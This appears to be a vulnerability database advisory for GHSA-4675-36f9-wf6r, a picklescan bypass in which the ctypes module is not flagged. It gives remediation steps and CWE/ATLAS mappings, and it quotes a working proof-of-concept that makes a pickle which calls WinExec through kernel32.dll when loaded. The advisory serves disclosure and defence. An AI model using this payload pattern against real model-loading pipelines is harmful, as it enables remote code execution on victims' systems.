picklescan is a last-line-of-defense security control for ML model files — this bypass nullifies that control entirely. Any organization using picklescan to gate pickle file loading in MLOps pipelines, model registries, or CI/CD must upgrade to v0.0.33 immediately. Until patched, assume picklescan provides zero protection against ctypes-based payloads and enforce strict allow-listing of model sources.
What is the risk?
HIGH risk with critical implications for AI/ML security posture. picklescan is commonly deployed as a trust gate for loading third-party or community ML models (PyTorch, scikit-learn, etc.). The ctypes bypass is particularly dangerous because: (1) it grants native OS-level code execution, not just Python-level; (2) it can dismantle Python interpreter sandboxes, defeating defense-in-depth; (3) a working PoC is publicly available, significantly lowering the barrier for attackers. Windows environments are most immediately threatened (WinDLL/WinExec), but the ctypes primitives are cross-platform and Linux/macOS variants are trivially achievable.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 0.0.33 | 0.0.33 |
What should I do?
Six steps:
1. PATCH: Upgrade picklescan to 0.0.33 immediately — this release adds ctypes to the dangerous module blocklist.
2. VERIFY: Audit CI/CD and MLOps pipelines to confirm the picklescan version in use; check Dockerfiles, requirements.txt, and pre-commit hooks.
3. INTERIM WORKAROUND: If an immediate upgrade is blocked, add an explicit denylist check for 'ctypes' in pre-load validation scripts.
4. ARCHITECTURE: Migrate to safer serialization formats (safetensors, ONNX, TorchScript) for any model served from untrusted sources — pickle should never be used for untrusted model distribution.
5. DETECTION: Search logs and artifact stores for .pkl/.pt/.pth files loaded from external sources in the last 90 days; treat any pre-patch external model load as potentially compromised.
6. POLICY: Enforce model provenance — only load models from signed, internal registries or verified publisher accounts.
Frequently Asked Questions
Is GHSA-4675-36f9-wf6r actively exploited?
No confirmed active exploitation of GHSA-4675-36f9-wf6r has been reported, but organizations should still patch proactively.
What systems are affected by GHSA-4675-36f9-wf6r?
This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, ML model registries, agent frameworks, data science environments.
What is the CVSS score for GHSA-4675-36f9-wf6r?
No CVSS score has been assigned yet.
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0010.001 AI Software
- AML.T0010.003 Model
- AML.T0011.000 Unsafe AI Artifacts
- AML.T0018.002 Embed Malware
- AML.T0097 Virtualization/Sandbox Evasion
- AML.T0107 Exploitation for Defense Evasion
What are the technical details?
Original Advisory
### Summary

Picklescan doesn't flag the ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to:

* Load DLLs
* Call C functions directly
* Manipulate raw memory pointers

This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter-based Python sandboxes, as ctypes allows direct access to raw memory. This is a more severe loophole than normal gadget chains and bypasses, as raw memory access can be used for a lot of nefarious purposes down the line if left undetected.

### PoC

```python
import pickle
import ctypes
import operator


class Kernel32Loader:
    def __reduce__(self):
        # we go direct to the kerneeellllllll
        return (ctypes.WinDLL, ("kernel32.dll",))


class WinExecGetter:
    def __reduce__(self):
        return (operator.itemgetter("WinExec"), (Kernel32Loader(),))


class PopCalc:
    def __reduce__(self):
        # methodcaller to invoke "__call__" on the function pointer.
        return (
            operator.methodcaller("__call__", b"calc.exe", 1),
            (WinExecGetter(),),
        )


try:
    payload = pickle.dumps(PopCalc())
    with open("calc_exploit.pkl", "wb") as f:
        f.write(payload)
    print("Generated 'calc_exploit.pkl'")
except Exception as e:
    print(f"Generation failed: {e}")
```

This will create a pickle file which is not detected by the latest version of picklescan as malicious.

```python
import pickle

print("Loading calc_exploit.pkl...")
pickle.load(open("calc_exploit.pkl", "rb"))
```

![Screenshot from the original advisory](https://github.com/user-attachments/assets/f5b066f3-116a-4377-a538-f293f3a6c176)
Exploitation Scenario
An adversary targeting an MLOps team publishes a malicious PyTorch model to a public repository (e.g., Hugging Face, GitHub). The model performs as advertised for its stated task but embeds a ctypes payload in its __reduce__ method. The victim organization's CI pipeline pulls the model, runs picklescan (< 0.0.33) — scan returns clean. The model is promoted to staging. Upon first load by a training or inference worker, pickle deserialization triggers the ctypes payload, loading kernel32.dll (Windows) or libc (Linux) and executing arbitrary OS commands under the service account's privileges — achieving persistent RCE in the MLOps environment without triggering any pickle-layer detection.
Weaknesses (CWE)
- CWE-184 Incomplete List of Disallowed Inputs (Primary)
- CWE-913 Improper Control of Dynamically-Managed Code Resources (Primary)
CWE-184 — Incomplete List of Disallowed Inputs: The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.
- [Implementation] Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.
Source: MITRE CWE corpus.
Related Vulnerabilities
- CVE-2026-3490 (10.0) picklescan: blocklist bypass enables full RCE (same package: picklescan)
- GHSA-vvpj-8cmc-gx39 (10.0) picklescan: security flaw enables exploitation (same package: picklescan)
- GHSA-g38g-8gr9-h9xp (9.8) picklescan: Allowlist Bypass evades input filtering (same package: picklescan)
- CVE-2025-1945 (9.8) picklescan: ZIP flag bypass enables RCE in PyTorch models (same package: picklescan)
- GHSA-7wx9-6375-f5wh (9.8) picklescan: Allowlist Bypass evades input filtering (same package: picklescan)